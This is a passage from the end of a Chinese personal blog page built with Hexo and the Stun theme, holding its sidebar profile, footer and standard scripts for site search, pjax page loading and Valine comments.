          说明</span></a></li></ol></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/head.png" alt="avatar"></div><p class="sidebar-ov-author__text">生命不息，折腾不止！</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/zhisenyu" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://www.youtube.com/channel/UCarZXyGTzWssmNANey0TC3g" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a><a class="sidebar-ov-social-item" href="z405454586" target="_blank" rel="noopener" data-popover="微信" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weixin"></i></span></a><a class="sidebar-ov-social-item" href="tencent://message?uin=405454586" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">42</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">9</div><div class="sidebar-ov-state-item__name">标签</div></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2022</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Jlan</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.0.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div><div class="busuanzi"><span class="busuanzi-siteuv"><span class="busuanzi-siteuv__icon"><i class="fas fa-user"></i></span><span class="busuanzi-siteuv__info">访问人数</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_uv"></span></span><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">浏览总量</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div><div>来自DarkFlow战队，暗流涌动</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1.0.1/dist/canvas-nest.min.js" color="0,0,0" opacity="0.6" count="150" zIndex="-1"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="https://cdn.jsdelivr.net/npm/pjax@latest/pjax.min.js"></script><script>window.addEventListener('DOMContentLoaded', function () {
  var pjax = new Pjax({"selectors":["head title","#main",".pjax-reload"],"history":true,"scrollTo":false,"scrollRestoration":false,"cacheBust":false,"debug":false,"currentUrlFullReload":false,"timeout":0});
  // 加载进度条的计时器
  var loadingTimer = null;

  // 重置页面 Y 方向上的滚动偏移量
  document.addEventListener('pjax:send', function () {
    $('.header-nav-menu').removeClass('show');
    if (CONFIG.pjax && CONFIG.pjax.avoidBanner) {
      $('html').velocity('scroll', {
        duration: 500,
        offset: $('#header').height(),
        easing: 'easeInOutCubic'
      });
    }

    var loadingBarWidth = 20;
    var MAX_LOADING_WIDTH = 95;

    $('.loading-bar').addClass('loading');
    $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    clearInterval(loadingTimer);
    loadingTimer = setInterval(function () {
      loadingBarWidth += 3;
      if (loadingBarWidth > MAX_LOADING_WIDTH) {
        loadingBarWidth = MAX_LOADING_WIDTH;
      }
      $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    }, 500);
  }, false);

  window.addEventListener('pjax:complete', function () {
    clearInterval(loadingTimer);
    $('.loading-bar__progress').css('width', '100%');
    $('.loading-bar').removeClass('loading');
    setTimeout(function () {
      $('.loading-bar__progress').css('width', '0');
    }, 400);
    $('link[rel=prefetch], script[data-pjax-rm]').each(function () {
      $(this).remove();
    });
    $('script[data-pjax], #pjax-reload script').each(function () {
      $(this).parent().append($(this).remove());
    });

    if (Stun.utils.pjaxReloadBoot) {
      Stun.utils.pjaxReloadBoot();
    }
    if (Stun.utils.pjaxReloadScroll) {
      Stun.utils.pjaxReloadScroll();
    }
    if (Stun.utils.pjaxReloadSidebar) {
      Stun.utils.pjaxReloadSidebar();
    }
    if (false) {
      if (Stun.utils.pjaxReloadHeader) {
        Stun.utils.pjaxReloadHeader();
      }
      if (Stun.utils.pjaxReloadScrollIcon) {
        Stun.utils.pjaxReloadScrollIcon();
      }
      if (Stun.utils.pjaxReloadLocalSearch) {
        Stun.utils.pjaxReloadLocalSearch();
      }
    }
  }, false);
}, false);</script><div id="pjax-reload"><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script></div><script src="https://cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script data-pjax="">function loadValine () {
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var guest_info = 'nick,mail,link';

  guest_info = guest_info.split(',').filter(function(item) {
    return GUEST_INFO.indexOf(item) > -1;
  });
  new Valine({
    el: '#valine-container',
    appId: 'PRycUaQbxE5mebmnKTjtaRJg-gzGzoHsz',
    appKey: 'jGyP9zr05MTuqHpWaIkgYW4h',
    notify: true,
    verify: true,
    placeholder: '写点什么吧',
    avatar: 'mp',
    meta: guest_info,
    pageSize: '10' || 10,
    visitor: true,
    recordIP: true,
    lang: 'zh-cn,en' || 'zh-cn',
    path: window.location.pathname
  });
}

if (true) {
  loadValine();
} else {
  window.addEventListener('DOMContentLoaded', loadValine, false);
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script></body></html>